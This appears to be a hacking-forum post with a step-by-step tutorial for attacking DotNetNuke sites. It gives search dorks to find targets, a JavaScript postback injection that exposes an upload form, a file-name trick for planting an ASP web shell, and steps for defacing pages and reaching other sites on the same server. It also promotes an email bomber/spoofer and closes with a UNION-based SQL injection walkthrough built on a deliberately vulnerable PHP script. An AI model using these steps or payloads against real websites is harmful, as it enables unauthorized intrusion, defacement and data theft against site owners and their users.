[Hot Tutorial!!!]DNN(DotNetNuke) attack+shell uploading[pics/Highly detailed]

Hello everyone!!
I am going to tell about Dot net nuke exploit.I know some of you know about it but it is very good exploit to hack dot net sites.it is fucking exploit.you can even hack all sites hosted on same server.You can upload any file using it.

Is it easy??? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting.

What is DNN ?

DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.

Here is step by step tutorial:
Upload random file

Code:

*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png,
*.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg,
*.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob

by defualt but admin may change this and you will have a Shell directly
step 1:use this dork to find vulnerable site

Code:

inurl:home/tabid/36/language/en-US/Default.aspx

another dorks you can use

Code:

inurl:fcklinkgallery.aspx
inurl:/portals/0

Spoiler (Click to Hide)

step 2:now open any site like

Code:

http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspx

replace "home/tabid/36/language/en-US/Default.aspx" with Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 
so your url will become

Code:

http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

then hit enter

and if you are lucky you will get this

Spoiler (Click to Hide)

step 3:Select 3rd option[file] 

Spoiler (Click to Hide)

step 4: inject the following java code in browser address bar

Code:

javascript:__doPostBack('ctlURL$cmdUpload','')

you will get this upload option.

Spoiler (Click to Hide)

step 4:Now just upload your file for example mine is z.txt.when it is uploaded we can see it in root dir.

Spoiler (Click to Hide)

step 5:Navigate to 

Code:

http://www.vulsite.com/portals/0/z.txt

Spoiler (Click to Hide)

You can see our file successfully uploaded.

method to upload shell:

Things you need:
An ASP shell
r57 or C99 Shell or anyother shell

step 4:rename your asp shell to

Code:

yourshell.asp;.jpg

and upload it.

step 5:Navigate it through 

Code:

http://www.vulsite.com/portals/0/yourshell.asp;.jpg

Spoiler (Click to Hide)

step 6:Now upload your php shell using upload file option marked in above image.

step 7:Navigate it through 

Code:

http://www.vulsite.com/portals/0/yourphpshell.php

Voila you have your shell.

Deface
step 8:Now replace your index.html with original index.html.Thats it.

all sites in server 
Well you can hack all sites hosted on same server.

Spoiler (Click to Hide)

For that follow in image and click on that you will find all sites hosted on same server.Click on any one site and Now you know what to do..

PHP Email Bomber & Spoofer [straight to Inbox]

Here is my Php email bomber and its working like charm.

Download it !

SQL Injection behind the Scene(sql injection derrière la scène)

Well Many people are injecting site with sql injection but most of them dont know what is going on behind it . so i have made this small tutorial for them . This is just basic scene behind mysql injection .
 Lets take server has index.html with following portion:

<htlml>
<body>
<a href="book.php?id=1">book</a>
</body>
</html>

Lets take server has another file named book.php that contains following php code .

<?php

// Make a MySQL Connection
$con = mysql_connect("localhost","user","pass");
if (!$con)
  {
  die('Could not connect: ' . mysql_error());
  }
mysql_select_db("my_db", $con);
$id=$_GET['id'];
$result = mysql_query("SELECT id,name,price FROM book WHERE id=$id");
$row=mysql_fetch_rows($result);
echo "Name:".$row['name'];
echo "Price:".$row['price'];
?>

table book looks like this :


Now we click on book we get through this link .

Code:

www.site.com/book.php?id=1

and we get output

Code:

name=sql price=15

so when you inject with '

Code:

www.site.com/book.php?id=1'

so following query will be sent to serve

Code:

SELECT id,name,price FROM book WHERE id=1'

server interpret special character ' , / , \ , * as incorrect syntax and we get mysql error .

Code:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1.

Counting no of Columns :

Code:

www.site.com/book.php?id=1 order by 1--

So following query will be sent to server

Code:

SELECT id,name,price FROM book WHERE id=1 order by 1

Means order by first(id) column

Code:

www.site.com/book.php?id=1 order by 2--

So following query will be sent to server

Code:

SELECT id,name,price FROM book WHERE id=1 order by 2

Means order by second(name) column

Code:

www.site.com/book.php?id=1 order by 3--

So following query will be sent to server

Code:

SELECT id,name,price FROM book WHERE id=1 order by 3

Means to order by third(price) column

Code:

www.site.com/book.php?id=1 order by 4--

So following query will be sent to server

Code:

SELECT id,name,price FROM book WHERE id=1 order by 4

Means to order by fourth column which does not exist .so we will get error

Code:

Unknown column '4' in 'order clause'

Union select part :

Code:

www.site.com/book.php?id=1 UnioN seLect 1,2,3--

Following query will be sent to server

Code:

SELECT id,name,price FROM book WHERE id=1 UnioN select 1,2,3

-- is used to ignore rest of query .

Here output will be combination of first and second injected query.It is necessary to make sure that first query returns no records and we get output of our second injected query.it is easy.we can do it in many way like

Code:

www.site.com/book.php?id=null UnioN seLect 1,2,3--

Now server goes through the book table , looking for a row where id is set to null.Since it will not find a row where is set to null no records will ne returned.The Only record that will be returned will be from our injected query .

Tip: All you have to do is specify a value that does not occur in the table.

Code:

www.site.com/book.php?id=xyz UnioN seLect 1,2,3--
www.site.com/book.php?id=-1 UnioN seLect 1,2,3--
www.site.com/book.php?id=1 div 0 UnioN seLect 1,2,3--

Just put something that looks out of the ordinary as best you can tell by looking at the legitimate values.
When a number is expected, zero and negative numbers often work well. For a text argument,simply use a string such as "NoSuchRecord", "NotInTable", or the ever-popular "sjdhalksjhdlka". Just as long as it won't return records.

we get number 2 and 3 on screen .

Why we see this vulnerable number on screen ?

Basically 2 and 3 is column name .
In source file there is echo statement which is displaying those rows of those columns which we are seeing on screen . Look above php source file and see

Code:

echo "Name:".$row['name'];
echo "Price:".$row['price'];

Thats why we get

Code:

Name:2  Price:3

Difference between integer and string based injection :

Lets take code is :

PHP Code:

$id=$_GET['id'];$result = mysql_query("SELECT id,name,price FROM book WHERE id=$id"); 

here id=value
so whatever we write directly will be accepted to id .

Now look foolowing code

PHP Code:

$id=$_GET['id'];$result = mysql_query("SELECT id,name,price FROM book WHERE id='$id'"); 

here id='value'
so to complete first ' we have to add another ' after value

Code:

www.site.com/book.php?id=1' order by 1-- -

will become

Code:

SELECT id,name,price FROM book WHERE id='1' order by 1-- -